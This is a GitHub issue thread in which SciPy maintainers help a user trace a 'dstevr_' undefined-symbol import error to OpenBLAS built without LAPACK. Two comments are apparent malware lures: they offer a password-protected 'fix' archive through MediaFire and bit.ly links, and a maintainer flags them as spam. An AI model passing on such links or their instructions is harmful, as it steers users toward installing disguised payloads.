### ISSUE TITLE
BUG: ImportError: wrt undefined symbol: dstevr_

### ISSUE THREAD

**Issue by tgurr** [scipy/scipy#21465] opened 2024-08-27 15:34 UTC
### Describe your issue.

Trying to run the application oversteer version 0.8.2 from https://github.com/berarma/oversteer (0.8.3 fails in the same way) with scripy 1.14.1 on Python 3.12 I get: `ImportError: /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/special/_ufuncs.cpython-312-x86_64-linux-gnu.so: undefined symbol: dstevr_`.

I already tried applying the commit/patch https://github.com/scipy/scipy/commit/afeab37e1a02a0cf09d9507fddab05795eea14fa from bug https://github.com/scipy/scipy/issues/21217 as it mentioned a similiar error message but it didn't help.

### Reproducing Code Example

```python
$ oversteer
```

### Error message

```shell
$ oversteer 
Kein Gerät verfügbar.
Traceback (most recent call last):
  File "/usr/host/bin/oversteer", line 53, in <module>
    sys.exit(app.run(sys.argv))
             ^^^^^^^^^^^^^^^^^
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/oversteer/application.py", line 131, in run
    from oversteer.gui import Gui
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/oversteer/gui.py", line 21, in <module>
    from .linear_chart import LinearChart
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/oversteer/linear_chart.py", line 1, in <module>
    from .signal import Signal
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/oversteer/signal.py", line 2, in <module>
    from scipy.ndimage.filters import uniform_filter1d
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/ndimage/__init__.py", line 154, in <module>
    from ._interpolation import *
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/ndimage/_interpolation.py", line 37, in <module>
    from scipy import special
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/__init__.py", line 134, in __getattr__
    return _importlib.import_module(f'scipy.{name}')
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/importlib/__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/special/__init__.py", line 807, in <module>
    from . import _ufuncs
ImportError: /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/special/_ufuncs.cpython-312-x86_64-linux-gnu.so: undefined symbol: dstevr_
```

### SciPy/NumPy/Python version and system information

```shell
$ python
Python 3.12.5 (main, Aug 12 2024, 15:36:18) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys, scipy, numpy; print(scipy.__version__, numpy.__version__, sys.version_info); scipy.show_config()
1.14.1 1.26.4 sys.version_info(major=3, minor=12, micro=5, releaselevel='final', serial=0)
Build Dependencies:
  blas:
    detection method: pkgconfig
    found: true
    include directory: /usr/x86_64-pc-linux-gnu/include
    lib directory: /usr/x86_64-pc-linux-gnu/lib
    name: openblas
    openblas configuration: USE_64BITINT= DYNAMIC_ARCH=0 DYNAMIC_OLDER= NO_CBLAS=
      NO_LAPACK=1 NO_LAPACKE=1 NO_AFFINITY= USE_OPENMP=1 HASWELL MAX_THREADS=12
    pc file directory: /usr/x86_64-pc-linux-gnu/lib/pkgconfig
    version: 0.3.28
  lapack:
    detection method: pkgconfig
    found: true
    include directory: /usr/x86_64-pc-linux-gnu/include
    lib directory: /usr/x86_64-pc-linux-gnu/lib
    name: openblas
    openblas configuration: USE_64BITINT= DYNAMIC_ARCH=0 DYNAMIC_OLDER= NO_CBLAS=
      NO_LAPACK=1 NO_LAPACKE=1 NO_AFFINITY= USE_OPENMP=1 HASWELL MAX_THREADS=12
    pc file directory: /usr/x86_64-pc-linux-gnu/lib/pkgconfig
    version: 0.3.28
  pybind11:
    detection method: pkgconfig
    include directory: /usr/x86_64-pc-linux-gnu/include
    name: pybind11
    version: 2.13.5
Compilers:
  c:
    args: -march=native, -O2, -pipe, -march=native, -O2, -pipe
    commands: x86_64-pc-linux-gnu-cc
    linker: ld.bfd
    linker args: -Wl,-O1, -Wl,--as-needed, -march=native, -O2, -pipe, -march=native,
      -O2, -pipe
    name: gcc
    version: 14.2.0
  c++:
    args: -march=native, -O2, -pipe, -march=native, -O2, -pipe
    commands: x86_64-pc-linux-gnu-c++
    linker: ld.bfd
    linker args: -Wl,-O1, -Wl,--as-needed, -march=native, -O2, -pipe, -march=native,
      -O2, -pipe
    name: gcc
    version: 14.2.0
  cython:
    commands: cython
    linker: cython
    name: cython
    version: 3.0.11
  fortran:
    commands: gfortran
    linker: ld.bfd
    linker args: -Wl,-O1, -Wl,--as-needed
    name: gcc
    version: 14.2.0
  pythran:
    include directory: ../../../../../../../../../../usr/lib/python3.12/site-packages/pythran
    version: 0.16.1
Machine Information:
  build:
    cpu: x86_64
    endian: little
    family: x86_64
    system: linux
  cross-compiled: false
  host:
    cpu: x86_64
    endian: little
    family: x86_64
    system: linux
Python Information:
  path: /usr/bin/python3.12
  version: '3.12'
```

**Comment by tgurr** [comment] 2024-08-27 15:42
> in response to above

I certainly won't download random stuff someone I don't even know and who doesn't seem to be affiliated with the project tells me to.

**Comment by nickodell** [comment] 2024-08-27 15:45
> I certainly won't download random stuff someone I don't even know and who doesn't seem to be affiliated with the project tells me to.

This is a spam comment that has been showing up over the last few days. You have the right idea here. :)

**Comment by nickodell** [comment] 2024-08-27 15:49
Does the following Python program fail by itself?

```
import scipy.special
```

If so, we know oversteer is not involved in the problem.

**Comment by tgurr** [comment] 2024-08-27 15:51
> Does the following Python program fail by itself?
> 
> ```
> import scipy.special
> ```
> 
> If so, we know oversteer is not involved in the problem.

Yes, it does:
```
$ python
Python 3.12.5 (main, Aug 12 2024, 15:36:18) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import scipy.special
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/special/__init__.py", line 807, in <module>
    from . import _ufuncs
ImportError: /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/special/_ufuncs.cpython-312-x86_64-linux-gnu.so: undefined symbol: dstevr_
```

**Comment by c0ffincolors** [comment] 2024-08-27 15:53
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nickodell** [comment] 2024-08-27 16:08
How did you install SciPy?

Did you use pip, or conda? If you did, what is your specific architecture/OS?

Did you build from source?

**Comment by tgurr** [comment] 2024-08-27 16:26
> How did you install SciPy?
> Did you use pip, or conda? If you did, what is your specific architecture/OS?
> Did you build from source?

I've installed the "package" from Exherbo Linux which is a source-based distribution like for example Gentoo Linux so it's also build from source.

Package source reciepe (we're doing nothing fancy to the build process as far as I can tell): https://gitlab.exherbo.org/exherbo/python/-/blob/master/packages/dev-python/scipy/scipy-1.14.1.exheres-0

I'm attaching the full build log if that helps: 
[dev-python_scipy-1.14.1-build.log](https://github.com/user-attachments/files/16765887/dev-python_scipy-1.14.1-build.log)

**Comment by YeGop0218** [comment] 2024-08-27 16:27
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by tgurr** [comment] 2024-08-27 18:30
> Two thoughts about what might be going on:
> 
> 1. It seems like this build process modifies our meson.build using sed to control which BLAS/LAPACK is used. That seems a little strange to me. We have a page in our docs about how to use [build flags](http://scipy.github.io/devdocs/building/blas_lapack.html) to control this.
>    Still, it doesn't seem like that could cause this kind of error.

There's still room for improvement on how we handle/transition to supporting pep517, hence the comment in the package that using sed is just a hack until we're able to properly pass options to the meson-python backend (feature request is: https://gitlab.exherbo.org/exherbo/arbor/-/issues/70).

> 2. In the build log, I see that shared libraries are being stripped:
> 
> ```
> >>> Stripping inside /var/tmp/paludis/build/dev-python-scipy-1.14.1/image
> str /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/_lib/_ccallback_c.cpython-312-x86_64-linux-gnu.so
> str /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/_lib/_test_ccallback.cpython-312-x86_64-linux-gnu.so
> str /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/_lib/_fpumode.cpython-312-x86_64-linux-gnu.so
> str /usr/x86_64-pc-linux-gnu/lib/python3.12/site-packages/scipy/_lib/_test_deprecation_call.cpython-312-x86_64-linux-gnu.so
> ...
> ```
> I assume you're not stripping symbols from these libraries, right? What is this step doing?

Our package manager is able to control the behaviour of debug symbols, either strip them, preserve them or split them to /usr/lib/debug/. 

> symbols
> Controls how debug symbols in executables and libraries are handled. If unset or set to preserve, no stripping is done. If set to strip, debug symbols are stripped. If set to split, debug symbols are split out into files in /usr/lib/debug/. If set to compress, symbols are also split out, and debug sections are compressed. Note that compress will only work with binutils >=2.21.51.0.4, and may cause problems with older versions of gdb.

Source: https://paludis.exherbolinux.org/configuration/use.html

Gentoo also for example has an analogue via their portage package manager and strips by default: https://devmanual.gentoo.org/eclass-reference/make.conf/index.html

To rule things out I've now also tested with stripping disabled and reinstalled scipy but the outcome/error is still the same.

**Comment by tgurr** [comment] 2024-08-29 14:28
I had some more time to look into this and it turned out to be a downstream problem, huge sorry for the noise!

For the details we're building OpenBLAS with NO_LAPACK=1 and currently provide the lapack implementation via lapack, scipy didn't fail on this and as a result things didn't work like intented, as far as I understand.

So building scipy with `-Dlapack=lapack` instead of `-Dlapack=openblas`  the output of `import sys, scipy, numpy; print(scipy.__version__, numpy.__version__, sys.version_info); scipy.show_config()` now differs in the lapack section:

Before: 
```
 lapack:
    detection method: pkgconfig
    found: true
    include directory: /usr/x86_64-pc-linux-gnu/include
    lib directory: /usr/x86_64-pc-linux-gnu/lib
    name: openblas
    openblas configuration: USE_64BITINT= DYNAMIC_ARCH=0 DYNAMIC_OLDER= NO_CBLAS=
      NO_LAPACK=1 NO_LAPACKE=1 NO_AFFINITY= USE_OPENMP=1 HASWELL MAX_THREADS=12
    pc file directory: /usr/x86_64-pc-linux-gnu/lib/pkgconfig
    version: 0.3.28
```

After:
```
  lapack:
    detection method: pkgconfig
    found: true
    include directory: /usr/x86_64-pc-linux-gnu/include
    lib directory: /usr/x86_64-pc-linux-gnu/lib
    name: lapack
    openblas configuration: unknown
    pc file directory: /usr/x86_64-pc-linux-gnu/lib/pkgconfig
    version: 3.12.0
```
and now `import scipy.special` doesn't throw any error message anymore:

```
$ python
Python 3.12.5 (main, Aug 12 2024, 15:36:18) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import scipy.special
>>>
```
and thus oversteer also doesn't fail to start anymore.

Not sure if there's anything on the scipy side to improve like to fail when `-Dlapack=openblas` is passed and the installed OpenBLAS package doesn't provide the lapack implementation. Feel free to cose this issue and again thanks for your time and help!

**Comment by rgommers** [comment] 2024-09-02 19:42
> For the details we're building OpenBLAS with NO_LAPACK=1 and currently provide the lapack implementation via lapack, scipy didn't fail on this and as a result things didn't work like intented, as far as I understand.

Yes you are correct indeed, that is currently going to result in a problem. 

> Not sure if there's anything on the scipy side to improve like to fail when `-Dlapack=openblas` is passed and the installed OpenBLAS package doesn't provide the lapack implementation.

Yes, there is. I have implemented the fix, but upstreaming it into Meson and then updating the SciPy BLAS support to mirror what NumPy does has turned into a long slog. It will be finished in the near future, and then we'll be able to detect this issue and even auto-correct for it.

That said, please do not build OpenBLAS with `NO_LAPACK=1` unless you have a very good reason for it. This isn't only going to yield issues for SciPy, but for other projects as well. Arch Linux used to do this for a long time, and it was always a pain point. Quoting from http://www.openmathlib.org/OpenBLAS/docs/distributing/ (disclaimer: I wrote those docs):

_"Recommendation: .... 2. Include LAPACK and LAPACKE. The LAPACK interface is also widely used, and while it does make up a significant part of the binary size of the installed library, that does not outweigh the regression in usability when deviating from the default here [1]_

_[1] All major distributions do include LAPACK as of mid 2023 as far as we know. Older versions of Arch Linux did not, and that was known to cause problems."_

> Feel free to cose this issue and again thanks for your time and help!

The problem is solved, so let's close this indeed. Thanks @tgurr and @nickodell.

**Closed by rgommers** 2024-09-02 19:42 UTC
Labels: defect, scipy.special
